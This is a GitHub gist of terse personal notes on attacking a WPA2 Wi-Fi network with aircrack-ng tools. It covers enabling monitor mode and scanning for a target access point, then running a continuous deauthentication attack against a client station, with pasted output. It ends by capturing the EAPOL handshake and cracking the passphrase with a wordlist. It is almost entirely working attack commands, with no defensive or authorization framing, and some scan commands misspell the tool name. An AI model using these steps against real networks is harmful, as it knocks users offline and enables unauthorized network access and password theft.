Skip to content

Instantly share code, notes, and snippets.

@raresteak

raresteak/wireless.md

Created April 12, 2025 14:04
Show Gist options
  • Save raresteak/f3cc352f8038875c701547176bed698b to your computer and use it in GitHub Desktop.
Save raresteak/f3cc352f8038875c701547176bed698b to your computer and use it in GitHub Desktop.
Download ZIP
Some wifi notes
Raw
wireless.md

place adapter in monitor mode

sudo airmon-ng start wlan1

scan for targets

sudo airodump wlan1mon --band a # a band 5ghz

or

sudo airodump wlan1mon # defautls to bg 2ghz mode

narrow down your targets to one access point

obtain AP MAC and channel from above

sudo airodump-ng wlan1mon --band a --channel 173 -M -d AA:BB:CC:DD:EE:FF

-d access point MAC

deauth a station

sudo aireplay-ng --deauth 0 -c FF:EE:DD:CC:BB:AA -a AA:BB:CC:DD:EE:FF wlan1mon

-c station MAC -a access point MAC

output

13:16:55  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 173
13:16:56  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [24|61 ACKs]
13:16:56  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [33|62 ACKs]
13:16:57  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|61 ACKs]
13:16:58  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|54 ACKs]
13:16:58  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|63 ACKs]
13:16:59  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:16:59  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|62 ACKs]
13:17:00  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [12|61 ACKs]
13:17:00  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|64 ACKs]
13:17:01  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|63 ACKs]
13:17:02  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|51 ACKs]
13:17:02  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:17:03  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|61 ACKs]
13:17:03  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:17:04  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 1|60 ACKs]
^C

capturing EAPOL

sudo airodump-ng wlan1mon --band   a --channel 173 -M -d AA:BB:CC:DD:EE:FF -w mycapturefile

output

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSI    MANUFACTURER

 AA:BB:CC:DD:EE:FF  -57 100      324      553   52 153  780   WPA2 CCMP   PSK  862WIRE 2WIRE                                               

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:11  -52   18e-24e  9207      306  EAPOL                                                                     
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:22  -50   24e-24      0       11                                                                            
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:33  -54   24e-24      0      205                                                                            
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:44  -55   24e-24      0       11                                                                            
Quitting...

wait for Notes column to show EAPOL, then stop capture

cracking

aircrack-ng -w somewordlist.txt mycapturefile-01.cap
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment